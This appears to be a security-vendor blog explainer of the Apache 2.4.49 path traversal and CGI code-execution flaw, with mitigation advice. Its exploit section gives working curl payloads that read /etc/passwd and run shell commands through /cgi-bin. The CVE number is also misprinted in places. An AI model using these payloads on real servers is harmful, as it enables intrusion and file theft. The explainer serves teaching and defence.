CVE-2021-41773 explained

What is CVE-2021-4177?

CVE-2021-41772 is a path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49. It was reported by Ash Daulton and the cPanel Security Team on September 29 and published on Apache HTTP Server Project Security advisory on October 4, 2021. 

This vulnerability allows unauthenticated attackers to access sensitive information and execute arbitrary code remotely on the exploited system.

Although a patch for this vulnerability was released in Apache HTTP Server 2.4.50, it was found to be insufficient to address it, leaving that version still vulnerable to path traversal and remote code execution attacks.

The incomplete fix for CVE-2021-41773 was introduced as CVE-2021-42013 and was subsequently addressed in Apache HTTP Server 2.4.51. This makes both the 2.4.49 and 2.4.50 versions vulnerable, while earlier versions are not affected.

CVE-2021-41772 was initially identified as a path traversal vulnerability, but it was later discovered that if the mod_cgi module is enabled on the Apache server, it could potentially result in remote code execution on the system.

This vulnerability exploits a change to path normalization introduced in Apache HTTP Server 2.4.49 allowing unauthenticated attackers to access files located outside of the defined virtual directory path.

How does path normalization work in Apache HTTP Server 2.4.49?

Path normalization is a critical security and performance process in web applications that prevents unauthorized access to sensitive files and directories.

It acts as a "filter", converting URL paths into a standard format to prevent unwanted behaviors, such as users trying to access files outside the web root by manipulating URL paths.

To comply with RFC 1808 Apache HTTP Server 2.4.49 introduced a change to the ap_normalize_path function. It checks for and removes path traversal attack patterns, such as ../../, from URL requests, and decodes percent-encoded (URL) characters, to ensure the security and proper handling of URL paths. 

However, the function's implementation had a significant flaw. 

If we drill down to the source code we can see that the function iterates through each character in the input URL string applying various transformations. 

If it comes across a double dot .. followed by a slash / or the end of the path, it will remove the previous ../ segment if it exists, along with the current one.

That functionality itself does not present a vulnerability. However, if we look at the URL decoding section of the code, we can see when the function encounters a URL-encoded character it proceeds to decode it. 

The issue here is that it only handles the first dot . encountered in the path. As later commented in the code by the developer responsible for the fix.

Due to the function not fully decoding the entire URL before normalization, it is possible to bypass security checks by encoding traversal sequences.

For instance, by converting ../ to .%2e/, the encoded characters could pass through the path traversal bypass undetected, as the function did not identify them as part of the attack pattern.

Vulnerability description

While the logic flaw in ap_normalize_path presents a significant issue, it becomes particularly dangerous when combined with misconfigured server directives.

Server directives act as rules to define the behavior of the Apache HTTP Server. Misconfiguring these rules can expose sensitive directories and allow unauthorized access to files.

The Require all granted directive allows access to the resources on the specified path for all clients. This access control configuration is usually applicable to public directories.

The default configuration on the Apache HTTP server restricts all requests to access resources inside the DocumentRoot with the Deny from all directive. The DocumentRoot is the directory from which the server will serve client-requested resources.

If the server is configured with the Require all granted directive at the root level, this makes the whole file system publicly accessible.

The server can use other directories if symbolic links and aliases are configured.

The cgi-bin directory in Apache is by default an alias directory with the Require all granted directive, which allows public access, meaning everyone can request to the /usr/local/apache2/cgi-bin/ directory.

By combining the logic flaw in the ap_normalize_path function that allows the path traversal bypass and a misconfigured Require all granted directive on the server, attackers can access files on the server files system outside intended directories.

This vulnerability can be further exploited leading to Remote Code Execution if mod_cgi is enabled on the server. 

By default this module is not enabled on Apache HTTPD, this means that the default version is not vulnerable to RCE.

mod_cgi allows the execution of CGI (Common Gateway Interface) scripts on the server and the output returned to the client; it's used mainly to provide dynamic features to websites.

Leveraging the path traversal vulnerability, attackers can bypass security checks and access files and directories in the server’s file system through the cgi-bin directory. With mod_cgi enabled, they can execute scripts on the server.

Steps to exploit CVE-2021-41773

Let's start by identifying the server version using an Nmap version detection scan to verify if it matches the vulnerable version.

nmap -sV <IP-address/hostname>

To execute the path traversal exploit, we'll send a request to the web server in an attempt to access the /etc/passwd file.

To bypass security checks, we'll utilize URL encoding. We've observed that the decoding mechanism in Apache HTTP Server's normalization feature only handles the first occurrence of .. To ensure our exploit works, we need to arrange the URL-encoded . (%2e) to come after the unencoded . .

curl http://apache:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd

This request attempts to retrieve the /etc/passwd file by traversing the file path starting from /cgi-bin.

To test for remote code execution we'll send a POST request with the command cat /etc/passwd/. If mod_cgi is enabled on the server it will execute on the target and the output shown to us.

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;cat /etc/passwd'

Mitigation

As CVE-2021–41773 affects versions 2.4.49 and version 2.4.50 presents an insufficient fix, the recommended mitigation is to upgrade to version 2.4.51 to the most recent.

If updating is not an option it's advisable to audit directories to restrict public access:

• Require all denied directives must be implemented on all directories not intended for public access and never at the root/directory.

• /cgi-bin directory should be configured with the Require all denied directive and should not be set as an alias.

Stay ahead of threats with Hack The Box

HTB releases new content every month that’s based on emerging threats and vulnerabilities. This allows teams to train on real-world, threat-landscape-connected scenarios in a safe and controlled environment.  

In response to this vulnerability, we released ApacheCGI, a machine that showcases a path traversal vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 (labeled CVE-2021-41773), which allows unauthenticated attackers to read files outside of the virtual directory path bounds. Furthermore, if CGI scripts are enabled, this could allow for remote code execution on the system.

Hack The Box provides a wide range of scenarios to keep your team’s skills sharp and up-to-date.

Organizations like Toyota, NVISO, and RS2 are already using the platform to stay ahead of threats with hands-on skills and a platform for acquiring, retaining, and developing top cyber talent. Talk to our team to learn more.